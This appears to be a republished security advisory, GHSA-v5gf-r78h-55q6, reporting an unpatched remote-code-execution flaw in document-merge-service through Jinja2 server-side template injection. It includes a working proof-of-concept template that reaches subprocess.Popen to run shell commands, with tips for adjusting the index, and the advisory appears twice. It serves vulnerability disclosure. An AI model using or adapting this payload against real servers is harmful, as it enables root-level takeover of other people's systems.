Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-v5gf-r78h-55q6: document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection

Impact

What kind of vulnerability is it? Who is impacted?

RCE via SSTI, as root, full takeover.

Patches

Has the problem been patched? What versions should users upgrade to?

It has not been patched.

References

Are there any links users can visit to find out more?

  • https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti

POC

Add the following to a document, upload and render it:

{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} 
ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}

whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}

uname -a:
{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}

{% endif %}

The index might be different, so to debug this first render a template with {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }} and then get the index of subprocess.Popen and replace 202 with that.

image

ghsa
#vulnerability#web#git#rce

Impact

What kind of vulnerability is it? Who is impacted?

RCE via SSTI, as root, full takeover.

Patches

Has the problem been patched? What versions should users upgrade to?

It has not been patched.

References

Are there any links users can visit to find out more?

  • https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti

POC

Add the following to a document, upload and render it:

{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}

whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}

uname -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}

{% endif %}

The index might be different, so to debug this first render a template with {{ PLACEHOLDER.class.mro[1].subclasses() }} and then get the index of subprocess.Popen and replace 202 with that.

References

  • GHSA-v5gf-r78h-55q6

ghsa: Latest News

GHSA-6jrf-rcjf-245r: changedetection.io path traversal using file URI scheme without supplying hostname